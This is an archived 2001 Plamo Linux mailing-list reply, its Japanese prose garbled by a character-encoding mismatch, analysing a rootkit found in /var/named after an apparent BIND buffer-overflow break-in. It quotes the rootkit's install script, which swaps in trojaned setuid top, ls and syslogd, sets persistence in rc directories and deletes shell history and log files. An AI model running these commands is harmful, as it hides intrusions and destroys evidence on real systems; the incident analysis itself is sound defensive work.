[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[plamo:10200] Re: named±¿ÍÑ»þ¤ËºîÀ®¤µ¤ì¤ë²ø¤·¤¤¥Õ¥¡¥¤¥ë¤Ë¤Ä¤¤¤Æ
-
From:KOJIMA
-
Date:Sat, 16 Jun 2001 00:58:56 +0900
- Subject: [plamo:10200] Re: named±¿ÍÑ»þ¤ËºîÀ®¤µ¤ì¤ë²ø¤·¤¤¥Õ¥¡¥¤¥ë¤Ë¤Ä¤¤¤Æ
- From: KOJIMA <kojima@xxxxxxxxxxx>
- Date: Sat, 16 Jun 2001 00:58:56 +0900
- Posted: Sat, 16 Jun 2001 00:59:15 +0900
From: Kenyu Kawamoto <kenyu_k@f6.dion.ne.jp>
Subject: [plamo:10198] named±¿ÍÑ»þ¤ËºîÀ®¤µ¤ì¤ë²ø¤·¤¤¥Õ¥¡¥¤¥ë¤Ë¤Ä¤¤¤Æ
Date: Sat, 16 Jun 2001 00:22:03 +0900
Message-ID: <20010616000326.9C0B.KENYU_K@f6.dion.ne.jp>
> ¿·µ¬¤Ëºî¤Ã¤¿/var/named¥Ç¥£¥ì¥¯¥È¥ê¤Ë
> rk.tgz
> ¤Ê¤ë¥Õ¥¡¥¤¥ë¤È¡¢Å¸³«¤·¤¿rk¥Ç¥£¥ì¥¯¥È¥ê¤¬Â¸ºß¤·¤Þ¤·¤¿¡£
>
> ¤³¤ÎÃæ¤Ë¤Ï¡¢util¥Ç¥£¥ì¥¯¥È¥ê¤¬¤¢¤ê¡¢¤½¤ÎÃæ¤Ë¤Ï
> clear find netstat sl3y st syslogd top wpe
> du ls show sniffy str.sh sz var.log
> Åù¤Î²ø¤·¤²¤Ê¥Õ¥¡¥¤¥ë·´¤¬¤¢¤ê¤Þ¤¹¡£
¤³¤ì¤é¤Ï¤Þ¤º´Ö°ã¤¤¤Ê¤¯ crack ÍѤΥġ¼¥ë¤Ç¤·¤ç¤¦¡¥Â¿Ê¬¡¤named ¤Î buffer
overflow ¥Ð¥°¤òÉÕ¤«¤ì¤Æ root ¤Î¥Ñ¡¼¥ß¥Ã¥·¥ç¥ó¤ò¼è¤é¤ì¤Æ¤³¤ì¤é¤Î¥Ñ¥Ã¥±¡¼
¥¸¤ò¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤ë¤ß¤¿¤¤¡¥
>
> for i in {2,3,4,5}
> do
> cp -f S80rpcmap /etc/rc.d/rc$i.d/
> done
¤¦¡¼¤à¡¤¡¤/etc/rc.d/rc[1-6].d ¤Ê¤ó¤Æ¤Î¤¬¤¢¤ë¤Î¤Ï¤³¤¦¤¤¤¦°ÕÌ£¤Ç¤Ï¥Þ¥º¤¤
¤Î¤«¡¥
> rm -rf /usr/bin/top
> mv -f top /usr/bin/top
> chmod 4555 /usr/bin/top
¤³¤Î¥Ø¥ó¤Ç top ¤òÆþ¤ì¤«¤¨¤Æ¡¤²ø¤·¤¤¥×¥í¥»¥¹¤Ïɽ¼¨¤·¤Ê¤¤¤è¤¦¤Ë¤·¤Æ¤¤¤ë
¤ß¤¿¤¤¤Ç¤¹¤Í¡¥
> chattr -i /sbin/syslogd > /dev/null 2>&1
> killall -9 syslogd
> touch -acmr /sbin/syslogd syslogd
> mv -f syslogd /sbin/syslogd
> chmod 4555 /sbin/syslogd
¤³¤Î¤¢¤¿¤ê¤Ç syslogd ¤òÆþ¤ì¤«¤¨¤Æ¡¤²ø¤·¤¤Æ°ºî¤ÏµÏ¿¤·¤Ê¤¤¤è¤¦¤Ë¤·¤Æ¤¤
¤ë¤ó¤À¤í¤¦¤Ê¡¥¤·¤«¤â¤½¤ì¤ò chattr ¤·¤Æ¤¤¤ë¤Î¤«¡¥
> #
> chattr -i /bin/ls > /dev/null 2>&1
> touch -acmr /bin/ls ls
> mv -f ls /bin/ls
> chmod 4555 /bin/ls
¤³¤ì¤â ls ¤òÆþ¤ì¤«¤¨¤Æ¡¤²ø¤·¤¤¥×¥í¥°¥é¥à¤Ïɽ¼¨¤µ¤»¤Ê¤¤¤è¤¦¤Ë¤·¤Æ¤¤¤ë¤Î
¤Ç¤·¤ç¤¦¡¥
> chattr -i /bin/netstat > /dev/null 2>&1
> chattr -i /usr/bin/du > /dev/null 2>&1
> chattr +i /usr/bin/top
> chattr +i /bin/netstat
> chattr +i /usr/bin/find
> chattr +i /sbin/syslogd
¤³¤Î¤¢¤¿¤ê¤â¿ʬƱ¤¸¤Ç¡¤²ø¤·¤¤¥×¥í¥»¥¹Åù¤òɽ¼¨¤·¤Ê¤¤¤è¤¦¤Ë²þ¤¤·¤¿¥³¥Þ
¥ó¥É¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤Æ¤¤¤ë¤Î¤À¤È»×¤¤¤Þ¤¹¡¥
> rm -rf ~/.bash_history /var/log/xferlog* /var/log/secure* /var/log/lastlog*
> echo -e "\n - Gata ! - Have Phun ! - "
¤Ç¡¤ºÇ¸å¤Ë¤³¤¦¤ä¤Ã¤Æ¥í¥°¤ÎµÏ¿¤ò¾Ã¤·¤Æ¾ÚµòÞÐÌǤò¤Ï¤«¤ë¤Î¤«¡¥¡¥¡¥¤Ê¤«¤Ê
¤«¹Í¤¨¤Æ¤¤¤ë¤Ê¤¡¡¥
named ¤Î buffer overflow ¤Ê¥Ð¥°¤Ï¤·¤Ð¤·¤Ð¤Ä¤«¤ì¤ë¤È¤³¤í¤Ê¤Î¤Ç¡¤named
¤òÆ°¤«¤¹ºÝ¤ÏºÇ¿·ÈǤò¼«Á°¤Ç¥³¥ó¥Ñ¥¤¥ë¤¹¤ëÊý¤¬°ÂÁ´¤Ç¤·¤ç¤¦¤Í¡¥
# plamo-2.2 ¤À¤È bind-8.2.3 ¤À¤±¤É¡¤¤³¤ì¤Ã¤ÆÂç¾æÉפʤó¤À¤Ã¤±¡© ¼«Á°¤Ç
# bind ¤òÆ°¤«¤·¤Æ¤Ê¤¤¤«¤é¡¤¤³¤Î¤¢¤¿¤ê¤Î¥Á¥§¥Ã¥¯¤Ï´Å¤¤¤Ç¤¹¤Í¡¥¡¥
-------
¤³¤¸¤Þ
- Follow-Ups
-
- [plamo:10201] Re: [plamo:10200] bind ¤Î Version U p to 8.2.4, Tadashi Nakamura
- [plamo:10204] Re: named±¿ÍÑ»þ¤ËºîÀ®¤µ¤ì¤ë²ø¤·¤¤¥Õ¥¡¥¤¥ë¤Ë¤Ä¤¤¤Æ, Kenyu Kawamoto
- References
-
- [plamo:10198] named±¿ÍÑ»þ¤ËºîÀ®¤µ¤ì¤ë²ø¤·¤¤¥Õ¥¡¥¤¥ë¤Ë¤Ä¤¤¤Æ, Kenyu Kawamoto
[¸¡º÷¥Ú¡¼¥¸]
[¥á¡¼¥ë°ìÍ÷]
Plamo ML ¸ø³«¥·¥¹¥Æ¥à